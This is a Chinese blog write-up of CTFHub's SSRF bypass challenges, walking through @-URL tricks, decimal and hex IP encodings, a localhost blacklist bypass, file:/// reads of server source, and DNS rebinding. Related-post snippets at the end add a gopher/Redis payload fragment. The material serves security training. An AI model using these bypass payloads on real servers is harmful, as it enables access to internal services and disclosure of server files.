CTFHUB技能树——SSRF(三)

已于 2024-05-24 18:16:06 修改
阅读量1.1k 收藏 29
点赞数 27
文章标签: 网络 ssrf
于 2024-05-24 18:13:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82985722/article/details/138720241
版权

目录

URL Bypass

数字IP Bypass

302跳转 Bypass

DNS重绑定 Bypass 

SSRF绕过方法:

(1)@          http://abc.com@127.0.0.1
(2)添加端口号      http://127.0.0.1:8080
(3)短地址        https://0x9.me/cuGfD
(4)可以指向任意ip的域名  xip.io
(5)ip地址转换成进制来访问 192.168.0.1=3232235521(十进制)
(6)非HTTP协议
(7)DNS Rebinding

CTFHUB技能树——SSRF(一)-CSDN博客

URL Bypass

@绕过

题目描述:请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧。

 打开环境,根据题目url访问,但是什么都没有

?url=http://notfound.ctfhub.com/127.0.0.1/flag.php

可使用HTTP 基本身份认证绕过:

HTTP 基本身份认证允许 Web 浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。
即    http://www.xxx.com@www.yyy.com形式

构造payload:                url访问得flag

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

题目描述:这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

根据题目描述知道点分十进制的IP被禁用,故使用其他方式表达数字

127.0.0.1的十进制:2130706433
127.0.0.1的十六进制:0x7F000001

构造payload:                          url访问得flag

?url=http://2130706433/flag.php

?url=http://0x7F000001/flag.php

302跳转 Bypass

题目描述:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

尝试访问?url=127.0.0.1/flag.php 

使用file:///协议 获取index.php、flag.php源码

?url=file:///var/www/html/index.php

?url=file:///var/www/html/flag.php

发现黑名单限制了127 、172、10、192。但没有限制localhost

localhost也叫local (本地服务器)
127.0.0.1在windows等系统是:本机地址(本机服务器)
通过本机的host文件,windows自动将localhost解析为127.0.0.1

所以可以localhost代替127.0.0.1

构造payload:                        得到flag

?url=localhost/flag.php

DNS重绑定 Bypass 

题目描述:关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助

附件文章

尝试访问?url=127.0.0.1/flag.php

使用file:///协议 获取的index.php、flag.php源码与上题一样,但使用localhost无法得到flag。

使用DNS重绑定

通过

rbndr.us dns rebinding service

DNS重绑定:

浏览网页过程中,用户在地址栏中输入包含域名的网址,浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。

即  域名 =>公共DNS服务器 => IP

作为域名的所有者,可以随时设置解析IP:

用户第一次访问,解析域名test.gm7.org的IP为104.21.26.222

在用户第二次访问前,修改域名解析的IP为127.0.0.1

用户第二次访问,解析域名test.gm7.org的IP为127.0.0.1

当我们发起域名解析请求的时候,第一次访问会返回一个ip地址A,但是当我们发起第二次域名解析请求的时候,却会返回一个不同于A的ip地址B。

渗透测试DNS重绑定_dns重绑定 ssrf-CSDN博客

网站设置DNS:

这个网站会随机指向两个绑定地址的其中一个,由于127段是回环地址,将AB设置成127.0.0.1127.0.0.2,每一个都能访问localhost

故构造payload:                        得到flag

?url=7f000001.7f000002.rbndr.us/flag.php

LLINELL
关注
通过ctfhub实操学习ssrf
不想当脚本小子的脚本小子
03-21 668
实战中碰到的SSRF漏洞比较少,刚好在freebuf上看到了一位大佬写的ssrf系统性学习文章(https://www.freebuf.com/articles/web/258365.html)就跟着一起学习一下。 SSRF,服务端请求伪造;一般情况下,SSRF攻击的目标是外网无法连接的内部系统,比如说当我们发现一个web服务器存在ssrf时,而它又连接内网,我们就可以利用这个服务器对内网发出一些请求来获取一些敏感信息,而此时的web服务器就被当作成为跳板使用; SSRF形成的原因是由于服务端提.
CTFHub靶场————SSRF
qq_61579604的博客
10-17 106
用户访问一个特定的域名,然后这个域名原来是一个正常的ip。但是当域名持有者修改域名对应的ip后,用户再访问这个域名的时候,浏览器以为你一直访问的是一个域名,就会认为很安全。SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php。要求是请求的URL中必须包含http://notfound.ctfhub.com这里我第一时间想到的是绕过。DNS重绑定并没有违反同源策略,相当于是钻了同源策略,同域名同端口访问的空子了。
CTFHUB SSRF
CN天狼
02-14 1347
CTFHUB SSRF post 上传文件 fastcgi Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定 Bypass
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
最新发布
2401_85783544的博客
07-24 1063
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
CTFHub SSRF
LYJ20010728的博客
08-10 722
CTFHub SSRFSSRF简介漏洞攻击方式CTFHub SSRF靶场第一部分(Http、Dict和file等协议的利用)内网访问伪协议读取文件端口扫描 SSRF简介 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统,也就是说可以利用一个网络请求的服务,当作跳板进行攻击
ctfhub ssrf
shinygod的博客
09-26 523
先用file读一下源码,flag.php中有key且要本地访问,index.php可以传参,可以利用index里的curl用gopher构造post请求,在本地访问flag.php。用gopher写文件,具体原理可以看(https://blog.csdn.net/shinygod/article/details/126995090)的309题。那么直接打:(具体原理可看:https://blog.csdn.net/shinygod/article/details/127034013 的360题)
CTFHUB - SSRF
m0_64180167的博客
10-05 583
gopher 是个万能协议 用来查看信息我们利用的时候 需要按GET POST 格式写请求包然后通过 一次url编码修改%0a 为 %0d%0a在末尾也要写上 %0d%0a然后再进行一次url编码然后按照 gopher格式gopher://ip:port/_数据流写入即可我们发现 ssrf 我们可以传递 需要的数据包 需要是值 我们就可以传递值 需要是文件我们也可以传递文件。
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 604
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 408
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
CTFHUB-SSRF-FastCGI协议
qq_62078839的博客
04-23 1928
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 第一种方式 exp import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2 = True if sys.version_info.major == 2 el
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2043
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
ctfhub--ssrf
qq_44418229的博客
06-10 1052
ctfhub----ssrf笔记
CTFHUB SSRF 【全】
Jay17的博客
04-17 1387
CTFHUB SSRF 题解 【全】
CTFHub-SSRF
Dug123456_的博客
04-09 813
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF【CTFHUB
D.MIND 的博客
05-14 761
file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容 http/s协议:探测内网主机存活 dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等 gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell 内网访问 http://127.0.0.1/flag.php http://0.0.0.0/fl.
CTFHubSSRF
遇事不决冲冲冲
04-24 2032
SSRF原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的
CTFHubSSRF
qq_45927819的博客
03-28 7110
文章目录伪协议读取文件端口扫描POST请求上传文件 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体用法请参考: https://www.cnblogs.com/-mo-/p/11673190.html 网站的根目录一般都是在/var/www/html下 使用file:///协议 ?url=file:///var/ww
ctfhub---SSRF
tansty_zh的博客
09-10 2215
1.内网访问 直接访问127.0.0.1/flag.php 2.伪协议读取文件 可以使用php伪协议中的file协议 构造playload:file:///var/www/html/flag.php flag在源代码中 3.端口扫描 dict协议可以用来探测开放的端口 构造payload dict://127.0.0.1: 利用burpsuite进行爆破 得到开放的端口为8666 进行访问 得到flag ...
ctfhub -SSRF
weixin_55702959的博客
02-09 632
内网访问 SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ?url=127.0.0.1/flag.php 抓包 伪协议读取文件 https://blog.csdn.net/qq_39431542/article/details/89483887 php伪协议: File:// 访问本地文件系统 http:// 访问 H
ctfhub web技能树302跳转
07-28
CTFHub的Web技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHub的Web技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值